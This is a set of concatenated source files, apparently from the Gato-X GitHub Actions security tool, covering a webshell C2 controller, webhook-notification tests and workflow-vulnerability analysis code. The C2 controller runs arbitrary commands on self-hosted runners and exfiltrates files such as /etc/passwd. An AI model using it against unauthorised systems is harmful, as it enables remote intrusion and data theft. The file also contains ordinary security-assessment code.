"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import asyncio
import re

from gatox.cli.output import Output

from .webshell_utils import WebShellUtils


class C2Controller:
    """Handles C2 command and control operations for WebShell attacks."""

    LINE_PATTERN = re.compile(r"^\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d{7}Z\s(.*)$")

    def __init__(self, api, user_perms: dict, timeout: int = 30):
        self.api = api
        self.user_perms = user_perms
        self.timeout = timeout

    async def interact_webshell(self, c2_repo: str, runner_name: str = None) -> bool:
        """
        Interacts with the webshell to issue commands.

        Args:
            c2_repo: C2 repository name
            runner_name: Specific runner name to use

        Returns:
            True if successful, False otherwise
        """
        if "repo" not in self.user_perms["scopes"]:
            Output.error("Insufficient scopes for C2 operator PAT!")
            return False

        # Handle repository name format
        if "/" not in c2_repo:
            username = self.user_perms["user"]
            c2_repo = f"{username}/{c2_repo}"

        # Get available runners
        runners = await self.api.get_repo_runners(c2_repo)
        if not runners:
            Output.error("No runners connected to C2 repository!")
            return False

        if not runner_name:
            runner_name = runners[0]["name"]

        # Display welcome message and commands
        self._display_welcome_message()

        try:
            while True:
                command = input(f"Command({Output.red(runner_name)})$ ")

                if command in ["exit", "!exit"]:
                    print("Exiting shell...")
                    break
                elif command == "!list_runners":
                    await self.list_runners(c2_repo)
                elif command.startswith("!select"):
                    runner_name = self._handle_runner_selection(command)
                elif command.startswith("!download"):
                    await self._handle_download_command(command, c2_repo, runner_name)
                elif command.startswith("!timeout"):
                    self._handle_timeout_command(command)
                elif command:
                    await self.issue_command(
                        c2_repo, command, timeout=self.timeout, runner_name=runner_name
                    )
                else:
                    Output.error("Command was empty!")

        except KeyboardInterrupt:
            print("Exiting shell...")

        return True

    def _display_welcome_message(self):
        """Display welcome message and available commands."""
        Output.info("Welcome to the Gato-X Webshell! Type 'exit' or '!exit' to exit.")
        Output.info(
            "The following meta commands are available, anything else will be sent to the target:"
        )
        Output.tabbed(
            "!list_runners - Lists all runners and labels connected to the C2 repository."
        )
        Output.tabbed("!select - Change the runner selection.")
        Output.tabbed(
            "!download SOURCE - Download the specified file from the runner as a workflow artifact. E.g.: !download /etc/passwd"
        )
        Output.tabbed(
            "!timeout - Change the timeout value in seconds, this can be useful for long running commands. Example: !timeout 500"
        )

    def _handle_runner_selection(self, command: str) -> str:
        """Handle runner selection command."""
        parts = command.split(" ")
        if len(parts) == 2:
            return parts[1]
        else:
            Output.error("Invalid runner select command!")
            return ""

    async def _handle_download_command(
        self, command: str, c2_repo: str, runner_name: str
    ):
        """Handle file download command."""
        parts = command.split(" ")
        if len(parts) == 2:
            file_download = parts[1]
            await self.issue_command(
                c2_repo,
                file_download,
                timeout=self.timeout,
                runner_name=runner_name,
                download=True,
            )
        else:
            Output.error("Invalid download command!")

    def _handle_timeout_command(self, command: str):
        """Handle timeout change command."""
        parts = command.split(" ")
        if len(parts) == 2:
            try:
                self.timeout = int(parts[1])
                Output.info(f"Timeout set to {self.timeout} seconds.")
            except ValueError:
                Output.error("Invalid timeout value!")
        else:
            Output.error("Invalid timeout command!")

    async def issue_command(
        self,
        c2_repo: str,
        parameter: str,
        timeout: int = 30,
        workflow_name: str = "webshell.yml",
        runner_name: str = "gato-ror",
        download: bool = False,
    ) -> bool | None:
        """
        Issue a command to a GitHub Actions runner and retrieve the output.

        Args:
            c2_repo: The name of the repository in 'owner/repo' format
            parameter: The command to be executed or file to download
            timeout: Maximum time to wait for workflow completion
            workflow_name: Name of the workflow file
            runner_name: Name of the runner where command will be executed
            download: If True, parameter is treated as a file to download

        Returns:
            True if successful, False otherwise, None if failed
        """
        dispatch_input = {"runner": runner_name}

        if download:
            dispatch_input["download_file"] = parameter
        else:
            dispatch_input["cmd"] = parameter

        # Get current timestamp for filtering
        curr_time = WebShellUtils.get_current_timestamp()

        # Issue the dispatch
        success = await self.api.issue_dispatch(
            c2_repo,
            target_workflow=workflow_name,
            target_branch="main",
            dispatch_inputs=dispatch_input,
        )

        if not success:
            Output.error("Unable to issue command!")
            return None

        # Get latest commit for workflow tracking
        await asyncio.sleep(5)
        resp = await self.api.call_get(
            f"/repos/{c2_repo}/commits", params={"per_page": 1}
        )

        if resp.status_code != 200:
            Output.error("Failed to get repository commits!")
            return None

        commit_sha = resp.json()[0]["sha"]

        # Wait for workflow to appear
        workflow_id = await WebShellUtils.wait_for_workflow(
            self.api, c2_repo, commit_sha, "webshell", f">{curr_time}", timeout
        )

        if workflow_id is None:
            return None

        # Wait for workflow completion
        status = await WebShellUtils.wait_for_workflow_completion(
            self.api, c2_repo, workflow_id, self.timeout
        )

        if status is None:
            return False

        # Handle download vs command output
        if download:
            await self._handle_download_result(c2_repo, workflow_id)
        else:
            await self._handle_command_output(c2_repo, workflow_id)

        return True

    async def _handle_download_result(self, c2_repo: str, workflow_id: int):
        """Handle file download result."""
        dest = await self.api.download_workflow_artifact(
            c2_repo, workflow_id, f"{str(workflow_id)}_exfil.zip"
        )

        if dest:
            Output.info("Downloaded file to: " + dest)
        else:
            Output.error("Unable to download artifact!")

    async def _handle_command_output(self, c2_repo: str, workflow_id: int):
        """Handle command output parsing."""
        runlog = await self.api.retrieve_workflow_log(c2_repo, workflow_id, "build")

        if not runlog:
            Output.error("Unable to retrieve workflow log!")
            return

        content_lines = runlog.split("\n")
        grp_cnt = 0

        for line in content_lines:
            if "##[endgroup]" in line and grp_cnt != 2:
                grp_cnt += 1
                continue

            if "Cleaning up orphan processes" in line:
                break

            if grp_cnt == 2:
                match = self.LINE_PATTERN.match(line)
                if match:
                    print(match.group(1))
                else:
                    break

    async def list_runners(self, c2_repo: str):
        """Lists all runners connected to the C2 repository."""
        runners = await self.api.get_repo_runners(c2_repo)

        if not runners:
            Output.error("No runners connected to C2 repository!")
            return

        Output.info(f"There are {len(runners)} runner(s) connected to {c2_repo}:")
        for runner in runners:
            runner_name = runner["name"]
            labels = ", ".join(
                [Output.yellow(label["name"]) for label in runner["labels"]]
            )
            status = runner["status"]
            Output.tabbed(
                f"Name: {Output.red(runner_name)} - Labels: {labels} - Status: {Output.bright(status)}"
            )



from .integration_utils import process_command


def test_help(capsys):
    output, error = process_command("gato-x enum -h", capsys)

    assert " gato-x enumerate [-h] [--target ORGANIZATION]" in output



import io
import json
from unittest.mock import AsyncMock, MagicMock, patch

import httpx
import pytest

from gatox.notifications.send_webhook import (
    _create_result_summary,
    send_discord_webhook,
    send_slack_webhook,
)


@pytest.fixture
def mock_config_manager():
    """Mock configuration manager with webhook URLs."""
    with patch("gatox.notifications.send_webhook.ConfigurationManager") as mock_cm:
        mock_instance = MagicMock()
        mock_instance.NOTIFICATIONS = {
            "SLACK_WEBHOOKS": [
                "https://hooks.slack.com/webhook1",
                "https://hooks.slack.com/webhook2",
            ],
            "DISCORD_WEBHOOKS": [
                "https://discord.com/api/webhooks/webhook1",
                "https://discord.com/api/webhooks/webhook2",
            ],
        }
        mock_cm.return_value = mock_instance
        yield mock_instance


@pytest.fixture
def sample_message():
    """Sample message for testing."""
    return "Test notification message"


@pytest.fixture
def long_message():
    """Long message for testing attachment functionality."""
    return json.dumps(
        {
            "repository_name": "TestUser/TestRepo",
            "issue_type": "PwnRequestResult",
            "triggers": ["pull_request_target"],
            "initial_workflow": "test.yml",
            "confidence": "High",
            "attack_complexity": "No Interaction",
            "explanation": "This is a test vulnerability with a very long explanation that exceeds Discord's 2000 character limit"
            + "x" * 2000,
            "paths": [{"nodes": [f"node_{i}" for i in range(100)]} for _ in range(20)],
        }
    )


@pytest.fixture
def sample_result_data():
    """Sample result data for summary testing."""
    return {
        "repository_name": "AmyJeanes/TARDIS",
        "issue_type": "PwnRequestResult",
        "triggers": ["pull_request_target"],
        "initial_workflow": "generate-files.yml",
        "confidence": "High",
        "attack_complexity": "No Interaction",
        "explanation": "Exploit requires no user interaction, you must still confirm there are no custom permission checks that would prevent the attack.",
    }


class TestSlackWebhook:
    """Test cases for Slack webhook functionality."""

    @pytest.mark.asyncio
    async def test_send_slack_webhook_success(
        self, mock_config_manager, sample_message
    ):
        """Test successful Slack webhook sending."""
        mock_response = MagicMock()
        mock_response.status_code = 200

        with patch("httpx.AsyncClient") as mock_client:
            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(return_value=mock_response)

            await send_slack_webhook(sample_message)

            # Verify correct number of calls (2 webhooks)
            assert mock_context.post.call_count == 2

            # Verify payload format
            calls = mock_context.post.call_args_list
            for call in calls:
                args, kwargs = call
                assert "json" in kwargs
                payload = kwargs["json"]
                assert "text" in payload
                assert json.dumps(sample_message, indent=4) in payload["text"]

    @pytest.mark.asyncio
    async def test_send_slack_webhook_connection_error_retry(
        self, mock_config_manager, sample_message
    ):
        """Test Slack webhook retry logic on connection error."""
        mock_response = MagicMock()
        mock_response.status_code = 200

        with (
            patch("httpx.AsyncClient") as mock_client,
            patch("asyncio.sleep") as mock_sleep,
        ):

            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context

            # First webhook: first call fails, second succeeds
            # Second webhook: succeeds immediately
            mock_context.post = AsyncMock(
                side_effect=[
                    httpx.ConnectError("Connection failed"),
                    mock_response,
                    mock_response,
                ]
            )

            await send_slack_webhook(sample_message)

            # Should have made 3 calls total (retry for first webhook + success for both)
            assert mock_context.post.call_count == 3
            mock_sleep.assert_called_once_with(1)

    @pytest.mark.asyncio
    async def test_send_slack_webhook_connection_error_max_retries(
        self, mock_config_manager, sample_message
    ):
        """Test Slack webhook failure after max retries."""
        with (
            patch("httpx.AsyncClient") as mock_client,
            patch("asyncio.sleep") as mock_sleep,
        ):

            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(
                side_effect=httpx.ConnectError("Connection failed")
            )

            with pytest.raises(
                ValueError,
                match="Failed to send webhook due to connection errors after 3 attempts",
            ):
                await send_slack_webhook(sample_message)

            # Should have tried 3 times
            assert mock_context.post.call_count == 3
            assert mock_sleep.call_count == 3

    @pytest.mark.asyncio
    async def test_send_slack_webhook_http_error(
        self, mock_config_manager, sample_message
    ):
        """Test Slack webhook HTTP error handling."""
        mock_response = MagicMock()
        mock_response.status_code = 500
        mock_response.text = "Internal Server Error"

        with patch("httpx.AsyncClient") as mock_client:
            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(return_value=mock_response)

            with pytest.raises(
                ValueError, match="Request to slack returned an error 500"
            ):
                await send_slack_webhook(sample_message)

    @pytest.mark.asyncio
    async def test_send_slack_webhook_empty_webhooks_list(self, sample_message):
        """Test Slack webhook with empty webhooks list."""
        with patch("gatox.notifications.send_webhook.ConfigurationManager") as mock_cm:
            mock_instance = MagicMock()
            mock_instance.NOTIFICATIONS = {"SLACK_WEBHOOKS": []}
            mock_cm.return_value = mock_instance

            with patch("httpx.AsyncClient") as mock_client:
                mock_context = AsyncMock()
                mock_client.return_value.__aenter__.return_value = mock_context
                mock_context.post = AsyncMock()

                await send_slack_webhook(sample_message)

                # Should not make any HTTP calls
                mock_context.post.assert_not_called()

    @pytest.mark.asyncio
    async def test_send_slack_webhook_client_timeout(self, mock_config_manager):
        """Test Slack webhook client timeout configuration."""
        mock_response = MagicMock()
        mock_response.status_code = 200

        with patch("httpx.AsyncClient") as mock_client:
            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(return_value=mock_response)

            await send_slack_webhook("test")

            # Verify timeout is set correctly
            mock_client.assert_called_once_with(
                http2=True, follow_redirects=True, timeout=10.0
            )


class TestDiscordWebhook:
    """Test cases for Discord webhook functionality."""

    @pytest.mark.asyncio
    async def test_send_discord_webhook_success(
        self, mock_config_manager, sample_message
    ):
        """Test successful Discord webhook sending."""
        mock_response = MagicMock()
        mock_response.status_code = 200

        with patch("httpx.AsyncClient") as mock_client:
            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(return_value=mock_response)

            await send_discord_webhook(sample_message)

            # Verify correct number of calls (2 webhooks)
            assert mock_context.post.call_count == 2

            # Verify payload format
            calls = mock_context.post.call_args_list
            for call in calls:
                args, kwargs = call
                assert "json" in kwargs
                payload = kwargs["json"]
                assert "content" in payload
                assert sample_message in payload["content"]

    @pytest.mark.asyncio
    async def test_send_discord_webhook_success_204(
        self, mock_config_manager, sample_message
    ):
        """Test successful Discord webhook sending with 204 status code."""
        mock_response = MagicMock()
        mock_response.status_code = 204

        with patch("httpx.AsyncClient") as mock_client:
            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(return_value=mock_response)

            await send_discord_webhook(sample_message)

            # Should succeed with 204 status
            assert mock_context.post.call_count == 2

    @pytest.mark.asyncio
    async def test_send_discord_webhook_connection_error_retry(
        self, mock_config_manager, sample_message
    ):
        """Test Discord webhook retry logic on connection error."""
        mock_response = MagicMock()
        mock_response.status_code = 200

        with (
            patch("httpx.AsyncClient") as mock_client,
            patch("asyncio.sleep") as mock_sleep,
        ):

            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context

            # First webhook: first call fails, second succeeds
            # Second webhook: succeeds immediately
            mock_context.post = AsyncMock(
                side_effect=[
                    httpx.ConnectError("Connection failed"),
                    mock_response,
                    mock_response,
                ]
            )

            await send_discord_webhook(sample_message)

            # Should have made 3 calls total (retry for first webhook + success for both)
            assert mock_context.post.call_count == 3
            mock_sleep.assert_called_once_with(1)

    @pytest.mark.asyncio
    async def test_send_discord_webhook_connection_error_max_retries(
        self, mock_config_manager, sample_message
    ):
        """Test Discord webhook failure after max retries."""
        with (
            patch("httpx.AsyncClient") as mock_client,
            patch("asyncio.sleep") as mock_sleep,
        ):

            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(
                side_effect=httpx.ConnectError("Connection failed")
            )

            with pytest.raises(
                ValueError,
                match="Failed to send Discord webhook due to connection errors after 3 attempts",
            ):
                await send_discord_webhook(sample_message)

            # Should have tried 3 times
            assert mock_context.post.call_count == 3
            assert mock_sleep.call_count == 3

    @pytest.mark.asyncio
    async def test_send_discord_webhook_http_error(
        self, mock_config_manager, sample_message
    ):
        """Test Discord webhook HTTP error handling."""
        mock_response = MagicMock()
        mock_response.status_code = 400
        mock_response.text = "Bad Request"

        with patch("httpx.AsyncClient") as mock_client:
            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(return_value=mock_response)

            with pytest.raises(
                ValueError, match="Request to Discord returned an error 400"
            ):
                await send_discord_webhook(sample_message)

    @pytest.mark.asyncio
    async def test_send_discord_webhook_empty_webhooks_list(self, sample_message):
        """Test Discord webhook with empty webhooks list."""
        with patch("gatox.notifications.send_webhook.ConfigurationManager") as mock_cm:
            mock_instance = MagicMock()
            mock_instance.NOTIFICATIONS = {"DISCORD_WEBHOOKS": []}
            mock_cm.return_value = mock_instance

            with patch("httpx.AsyncClient") as mock_client:
                mock_context = AsyncMock()
                mock_client.return_value.__aenter__.return_value = mock_context
                mock_context.post = AsyncMock()

                await send_discord_webhook(sample_message)

                # Should not make any HTTP calls
                mock_context.post.assert_not_called()

    @pytest.mark.asyncio
    async def test_send_discord_webhook_client_timeout(self, mock_config_manager):
        """Test Discord webhook client timeout configuration."""
        mock_response = MagicMock()
        mock_response.status_code = 200

        with patch("httpx.AsyncClient") as mock_client:
            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(return_value=mock_response)

            await send_discord_webhook("test")

            # Verify timeout is set correctly (should be 10.0 for short messages)
            mock_client.assert_called_once_with(
                http2=True, follow_redirects=True, timeout=10.0
            )

    @pytest.mark.asyncio
    async def test_send_discord_webhook_partial_failure(self, sample_message):
        """Test Discord webhook with partial failure (one webhook fails, another succeeds)."""
        with patch("gatox.notifications.send_webhook.ConfigurationManager") as mock_cm:
            mock_instance = MagicMock()
            mock_instance.NOTIFICATIONS = {
                "DISCORD_WEBHOOKS": [
                    "https://discord.com/api/webhooks/webhook1",
                    "https://discord.com/api/webhooks/webhook2",
                ]
            }
            mock_cm.return_value = mock_instance

            mock_success_response = MagicMock()
            mock_success_response.status_code = 200

            with patch("httpx.AsyncClient") as mock_client:
                mock_context = AsyncMock()
                mock_client.return_value.__aenter__.return_value = mock_context

                # First webhook fails, second succeeds - but this should still raise error
                mock_context.post = AsyncMock(
                    side_effect=[
                        httpx.ConnectError("Connection failed"),
                        httpx.ConnectError("Connection failed"),
                        httpx.ConnectError(
                            "Connection failed"
                        ),  # 3 retries for first webhook
                        mock_success_response,  # Second webhook succeeds
                    ]
                )

                with pytest.raises(
                    ValueError,
                    match="Failed to send Discord webhook due to connection errors after 3 attempts",
                ):
                    await send_discord_webhook(sample_message)


class TestWebhookIntegration:
    """Integration tests for webhook functionality."""

    @pytest.mark.asyncio
    async def test_webhook_json_serialization(self, mock_config_manager):
        """Test that complex objects are properly JSON serialized."""
        complex_message = {
            "alert": "Security Issue",
            "severity": "HIGH",
            "details": {
                "repository": "test/repo",
                "workflow": "ci.yml",
                "issues": ["injection", "pwn_request"],
            },
        }

        mock_response = MagicMock()
        mock_response.status_code = 200

        with patch("httpx.AsyncClient") as mock_client:
            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(return_value=mock_response)

            await send_slack_webhook(complex_message)
            await send_discord_webhook(complex_message)

            # Verify both webhooks were called
            assert mock_context.post.call_count == 4  # 2 slack + 2 discord webhooks

            # Verify JSON serialization worked
            calls = mock_context.post.call_args_list
            for call in calls:
                args, kwargs = call
                payload = kwargs["json"]
                # Should contain properly formatted JSON
                if "text" in payload:  # Slack
                    assert '"alert": "Security Issue"' in payload["text"]
                elif "content" in payload:  # Discord
                    assert '"alert": "Security Issue"' in payload["content"]

    @pytest.mark.asyncio
    async def test_webhook_unicode_handling(self, mock_config_manager):
        """Test that unicode characters are handled properly."""
        unicode_message = "Test message with unicode: 🚨 Alert! 中文 العربية"

        mock_response = MagicMock()
        mock_response.status_code = 200

        with patch("httpx.AsyncClient") as mock_client:
            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(return_value=mock_response)

            await send_slack_webhook(unicode_message)
            await send_discord_webhook(unicode_message)

            # Should handle unicode without errors
            assert mock_context.post.call_count == 4

    @pytest.mark.asyncio
    async def test_send_discord_webhook_long_message_with_attachment(
        self, mock_config_manager, long_message
    ):
        """Test Discord webhook with long message that gets split into summary + attachment."""
        mock_response = MagicMock()
        mock_response.status_code = 200

        with patch("httpx.AsyncClient") as mock_client:
            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(return_value=mock_response)

            await send_discord_webhook(long_message)

            # Verify correct number of calls (2 webhooks)
            assert mock_context.post.call_count == 2

            # Verify multipart payload format
            calls = mock_context.post.call_args_list
            for call in calls:
                args, kwargs = call
                assert "data" in kwargs
                assert "files" in kwargs

                # Check data payload
                data = kwargs["data"]
                assert "payload_json" in data
                payload = json.loads(data["payload_json"])
                assert "content" in payload
                assert "Analysis Summary:" in payload["content"]
                assert "analysis_details.json" in payload["content"]

                # Check file attachment
                files = kwargs["files"]
                assert "files[0]" in files
                filename, file_obj, content_type = files["files[0]"]
                assert filename == "analysis_details.json"
                assert content_type == "application/json"
                assert isinstance(file_obj, io.BytesIO)

    @pytest.mark.asyncio
    async def test_send_discord_webhook_long_message_timeout(
        self, mock_config_manager, long_message
    ):
        """Test Discord webhook with long message uses extended timeout."""
        mock_response = MagicMock()
        mock_response.status_code = 200

        with patch("httpx.AsyncClient") as mock_client:
            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(return_value=mock_response)

            await send_discord_webhook(long_message)

            # Verify timeout is set to 30.0 for long messages with attachments
            mock_client.assert_called_once_with(
                http2=True, follow_redirects=True, timeout=30.0
            )

    @pytest.mark.asyncio
    async def test_send_discord_webhook_short_message_normal_flow(
        self, mock_config_manager, sample_message
    ):
        """Test Discord webhook with short message uses normal JSON flow."""
        mock_response = MagicMock()
        mock_response.status_code = 200

        with patch("httpx.AsyncClient") as mock_client:
            mock_context = AsyncMock()
            mock_client.return_value.__aenter__.return_value = mock_context
            mock_context.post = AsyncMock(return_value=mock_response)

            await send_discord_webhook(sample_message)

            # Verify normal JSON payload
            calls = mock_context.post.call_args_list
            for call in calls:
                args, kwargs = call
                assert "json" in kwargs
                assert "data" not in kwargs
                assert "files" not in kwargs

                payload = kwargs["json"]
                assert "content" in payload


class TestSummaryGeneration:
    """Test cases for result summary generation."""

    def test_create_result_summary_complete_data(self, sample_result_data):
        """Test summary generation with complete result data."""
        summary = _create_result_summary(sample_result_data)

        assert '"repository_name": "AmyJeanes/TARDIS"' in summary
        assert '"issue_type": "PwnRequestResult"' in summary
        assert '"triggers": ["pull_request_target"]' in summary
        assert '"initial_workflow": "generate-files.yml"' in summary
        assert '"confidence": "High"' in summary
        assert '"attack_complexity": "No Interaction"' in summary
        assert '"explanation"' in summary

        # Verify JSON structure
        assert summary.startswith("{")
        assert summary.endswith("}")
        assert summary.count('"repository_name"') == 1

    def test_create_result_summary_partial_data(self):
        """Test summary generation with partial result data."""
        partial_data = {
            "repository_name": "test/repo",
            "issue_type": "InjectionResult",
            "confidence": "Medium",
        }

        summary = _create_result_summary(partial_data)

        assert '"repository_name": "test/repo"' in summary
        assert '"issue_type": "InjectionResult"' in summary
        assert '"confidence": "Medium"' in summary
        assert '"triggers"' not in summary
        assert '"initial_workflow"' not in summary

    def test_create_result_summary_empty_data(self):
        """Test summary generation with empty result data."""
        summary = _create_result_summary({})

        assert summary == "{\n    \n}"

    def test_create_result_summary_special_characters(self):
        """Test summary generation with special characters in data."""
        special_data = {
            "repository_name": "user/repo-with-dashes_and_underscores",
            "explanation": 'This has "quotes" and \nNewlines\tTabs',
            "triggers": ["push", "pull_request"],
        }

        summary = _create_result_summary(special_data)

        # Should handle special characters properly
        assert "repo-with-dashes_and_underscores" in summary
        assert '["push", "pull_request"]' in summary



"""
Copyright 2025, Adnan Khan

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""

import logging
import re

from gatox.models.workflow import Workflow
from gatox.workflow_graph.nodes.job import JobNode
from gatox.workflow_graph.nodes.node import Node

logger = logging.getLogger(__name__)


def _has_dispatch_toctou_risk(workflow_inputs):
    """
    Check if workflow dispatch inputs indicate potential TOCTOU vulnerability.

    This utility function checks if there's a PR number input without a required SHA,
    which could lead to Time-Of-Check to Time-Of-Use vulnerabilities.

    Args:
        workflow_inputs (dict): The workflow dispatch inputs to analyze

    Returns:
        bool: True if there's TOCTOU risk (PR number without required SHA), False otherwise
    """
    if not workflow_inputs:
        return False

    pr_num_found = False
    sha_found = False

    # Process inputs to determine if any contain a PR number.
    # This is a heuristic to identify workflows that are taking a PR number
    # or mutable reference.
    for key, val in workflow_inputs.items():
        if "sha" in key.lower():
            if isinstance(val, dict):
                # Suppress if sha is required
                if "required" in val:
                    if val["required"]:
                        sha_found = True

        elif re.search(
            r"(?:^|[\b_])(pr|pull|pull_request|pr_number)(?:[\b_]|$)",
            key,
            re.IGNORECASE,
        ):
            pr_num_found = True

    return pr_num_found and not sha_found


class WorkflowNode(Node):
    """Workflow node"""

    def __init__(self, ref: str, repo_name: str, workflow_path: str):
        """Constructor for workflow wrapper."""

        # Create a unique ID for this workflow.
        super().__init__(f"{repo_name}:{ref}:{workflow_path}")
        # By default, a workflow node is "uninitialized" until it is processed
        # with the workflow YAML. We sometimes add unititialized nodes to the
        # graph if a workflow references another workflow that has not been
        # processed yet.
        self.uninitialized = True
        self.non_existent = False  # True if workflow file doesn't exist
        self.__workflow_path = workflow_path
        self.__triggers = []
        self.__callers = []
        self.__excluded = False
        self.__repo_name = repo_name
        self.__env_vars = {}
        self.inputs = {}

    def __hash__(self):
        return hash((self.name, self.__class__.__name__))

    def __eq__(self, other):
        return isinstance(other, self.__class__) and self.name == other.name

    def set_params(self, params):
        """ """
        self.params = params

    def get_parts(self):
        """ """
        repo, ref, path = self.name.split(":")

        return repo, ref, path

    def repo_name(self):
        """ """
        return self.__repo_name

    def get_workflow_name(self):
        """
        Get name of the workflow file associated with the JobNode instance.

        Returns:
            str: The path to the workflow file.
        """
        return self.__workflow_path.replace(".github/workflows/", "")

    def __process_triggers(self, workflow_data: dict):
        """Retrieve the triggers associated with the Workflow node."""
        triggers = workflow_data.get("on", [])
        extracted_triggers = []

        if isinstance(triggers, list):
            return triggers
        elif isinstance(triggers, str):
            return [triggers]
        elif isinstance(triggers, dict):
            for trigger, trigger_conditions in triggers.items():
                if trigger == "pull_request_target":
                    if trigger_conditions and "types" in trigger_conditions:
                        if (
                            "labeled" in trigger_conditions["types"]
                            and len(trigger_conditions["types"]) == 1
                        ):
                            extracted_triggers.append(
                                f"{trigger}:{trigger_conditions['types'][0]}"
                            )
                        else:
                            extracted_triggers.append(trigger)
                    else:
                        extracted_triggers.append(trigger)
                elif trigger == "workflow_run":
                    if "branches" in trigger_conditions:
                        # If the branches filter is present, then
                        # forks cannot trigger the workflow.
                        self.__excluded = True
                    else:
                        extracted_triggers.append(trigger)
                elif trigger == "workflow_dispatch":
                    if not trigger_conditions or "inputs" not in trigger_conditions:
                        # If no inputs are present, then this workflow
                        # cannot have a dispatch TOCTOU
                        self.__excluded = True
                    else:
                        # Check if workflow has TOCTOU risk (PR number without required SHA)
                        if not _has_dispatch_toctou_risk(
                            trigger_conditions.get("inputs", {})
                        ):
                            self.__excluded = True
                        extracted_triggers.append(trigger)
                else:
                    extracted_triggers.append(trigger)

        return extracted_triggers

    def __process_inputs(self, workflow_data: dict):
        try:
            if (
                "workflow_dispatch" in self.__triggers
                and isinstance(workflow_data["on"], dict)
                and isinstance(workflow_data["on"]["workflow_dispatch"], dict)
                and "inputs" in workflow_data["on"]["workflow_dispatch"]
            ):
                return workflow_data["on"]["workflow_dispatch"]["inputs"]
            else:
                return {}
        except TypeError:
            logger.error(workflow_data["on"])

    def __process_envs(self, workflow_data: dict):
        if "env" in workflow_data:
            return workflow_data["env"]
        else:
            return {}

    def excluded(self):
        """Returns whether the workflow is excluded as it cannot be
        triggered from a fork."""
        return self.__excluded

    def get_env_vars(self):
        """Returns environment variables for the workflow."""
        return self.__env_vars

    def add_caller_reference(self, caller: JobNode):
        """Add a reference to a JobNode that calls this Workflow node,
        if it is not already marked (as we can reach it multiple times
        for nested relationships).
        """
        if caller not in self.__callers:
            self.__callers.append(caller)

    def get_caller_workflows(self):
        """Retrieve a set of the workflows that call this Workflow node."""
        if not self.__callers:
            return set()
        else:
            return {caller.get_workflow() for caller in self.__callers}

    def initialize(self, workflow: Workflow):
        """Initialize the Workflow node with the parsed workflow data."""
        self.__triggers = self.__process_triggers(workflow.parsed_yml)
        self.__env_vars = self.__process_envs(workflow.parsed_yml)

        self.inputs = self.__process_inputs(workflow.parsed_yml)
        self.uninitialized = False

    def mark_as_non_existent(self):
        """Mark this workflow as non-existent (file doesn't exist in repository)."""
        self.uninitialized = False
        self.non_existent = True

    def is_non_existent(self):
        """Check if this workflow is marked as non-existent."""
        return self.non_existent

    def get_triggers(self):
        """Retrieve the triggers associated with the Workflow node."""
        return self.__triggers

    def get_tags(self):
        """ """
        tags = super().get_tags()

        if self.non_existent:
            tags.add("non_existent")
        elif self.uninitialized:
            tags.add("uninitialized")
        else:
            tags.add("initialized")

        for trigger in self.__triggers:
            tags.add(trigger)

        return tags

    def get_attrs(self):
        """Retrieve node attributes associated with the Workflow node."""
        return {}



import json
import os
import pathlib
from unittest.mock import AsyncMock, patch

import pytest

from gatox.caching.cache_manager import CacheManager
from gatox.cli.output import Output
from gatox.enumerate.enumerate import Enumerator
from gatox.github.api import Api
from gatox.models.workflow import Workflow
from unit_test.utils import escape_ansi as escape_ansi

TEST_REPO_DATA = None
TEST_WORKFLOW_YML = None
TEST_ORG_DATA = None

Output(True)

BASE_MOCK_RUNNER = [
    {
        "machine_name": "unittest1",
        "runner_name": "much_unit_such_test",
        "runner_type": "organization",
        "non_ephemeral": False,
        "token_permissions": {"Actions": "write"},
        "runner_group": "Default",
        "requested_labels": ["self-hosted", "Linux", "X64"],
    }
]


@pytest.fixture(autouse=True)
def clear_cache():
    """
    Fixture to clear the CacheManager singleton instance before each test
    to prevent test interference.
    """
    CacheManager._instance = None
    yield
    # Clean up after test as well
    CacheManager._instance = None


@pytest.fixture(scope="session", autouse=True)
def load_test_files(request):
    global TEST_REPO_DATA
    global TEST_ORG_DATA
    global TEST_WORKFLOW_YML
    curr_path = pathlib.Path(__file__).parent.resolve()
    test_repo_path = os.path.join(curr_path, "files/example_repo.json")
    test_org_path = os.path.join(curr_path, "files/example_org.json")
    test_wf_path = os.path.join(curr_path, "files/main.yaml")

    with open(test_repo_path) as repo_data:
        TEST_REPO_DATA = json.load(repo_data)

    with open(test_org_path) as repo_data:
        TEST_ORG_DATA = json.load(repo_data)

